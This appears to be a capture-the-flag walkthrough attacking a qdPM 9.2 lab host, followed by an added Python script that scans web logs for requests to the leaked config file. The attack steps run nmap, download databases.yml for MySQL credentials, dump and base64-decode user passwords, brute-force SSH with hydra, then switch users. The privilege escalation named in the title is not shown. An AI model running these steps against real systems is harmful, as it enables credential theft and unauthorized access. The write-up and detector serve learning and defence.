SQL misconfiguration and privesc with path vulnerability

 


1 nmap 10.10.134.21 -sV

. -sV = Probe open ports to determine service/version info.






2 Open the IP address in a browser to show the admin page.














. qdPM 9.2 = the version shown on the website.

3 Check whether this version is exploitable.

















. The version is exploitable.

. Check the last line of the exploit: it gives the link to download the yml file. Link = http://<website>/core/config/databases.yml

4 Download the yml file to see the username and password for the MySQL database.





5 Check the yml file.











6 Log in to the MySQL database using the username and password.

# mysql -h 10.10.134.21 -u qdpmadmin -p

. -h = host

. -u = username.

. -p = password











7 Show the MySQL databases.

# show databases;








. This shows all databases in MySQL.

8 Go to the staff database and show its tables.

# use staff

# show tables;









. This column lists tables with information about the staff.

9 Show the user table data to get the usernames.

# select * from user;

. * = select all data.





. This shows all users.

. Copy all the usernames and make a list of users.

EX:- nano user.txt

. nano = a file editor in Linux for creating and modifying files.

10 Show the passwords for these users.

# select * from login;








. This shows all the passwords, but they are base64 encoded (base64 is an encoding, not encryption).

11 How to decode the passwords

. CyberChef = a website that can decode the passwords.











. Decode all the passwords, then make a list of the decoded passwords.

# nano lo.txt

. Paste all the passwords into it.

12 Brute-force the usernames and login passwords with the hydra tool.

# hydra -L [user name list] -P [password list] 10.10.134.21 ssh

. -L = user list.

. -P = password list.

. ssh = service name














. I found 2 usernames and passwords.

13 Log in over SSH with the travis username.

# ssh travis@10.10.134.21











14 Log in as the second user.

# su dexter

. su = a Linux command to switch user.
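
For the site owner, the download in steps 3 to 5 leaves a trace in the web server access log. The script below is an added example, not part of the original post: it scans access-log lines for requests to /core/config/*.yml and separates files that were served from requests that were blocked. The Combined Log Format, the sample lines and the function name are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Path named in the walkthrough: qdPM keeps its database credentials here.
SENSITIVE = re.compile(r"/core/config/[^\s?]*\.yml", re.IGNORECASE)

# Combined Log Format: ip - user [time] "METHOD path PROTO" status size ...
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_config_reads(lines):
    """Return {client_ip: [(timestamp, path, status, exposed)]} for config-file requests."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        path = unquote(m["path"])  # undo %-encoding before matching
        if not SENSITIVE.search(path):
            continue
        status = int(m["status"])
        # 2xx: the server handed the file over. 403/404: the request was refused.
        exposed = 200 <= status < 300
        hits[m["ip"]].append((m["ts"], path, status, exposed))
    return dict(hits)

# Constructed sample log lines (documentation IP ranges), not taken from the post.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Mar/2024:10:01:02 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2024:10:01:40 +0000] "GET /core/config/databases.yml HTTP/1.1" 200 312 "-" "curl/8.0"',
    '203.0.113.9 - - [10/Mar/2024:11:15:00 +0000] "GET /core/config/databases.yml HTTP/1.1" 403 199 "-" "Wget/1.21"',
    '203.0.113.9 - - [10/Mar/2024:11:15:05 +0000] "GET /index.php/login HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, events in find_config_reads(SAMPLE_LOG).items():
        for ts, path, status, exposed in events:
            verdict = "EXPOSED - rotate DB credentials" if exposed else "blocked"
            print(f"{ip} {ts} {path} -> {status} ({verdict})")
```

Any line reported as exposed means the MySQL username and password in the file should be treated as leaked and changed, and the web server should be configured to refuse requests under /core/config/.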











NOTE:- Please secure your domain before a black hat hacker finds this vulnerability, accesses your system, uses it for illegal purposes and damages it. For more information, contact me anytime.

NAME = Rachit

CONTACT NO. = 8810xxxxxx

THANKS.
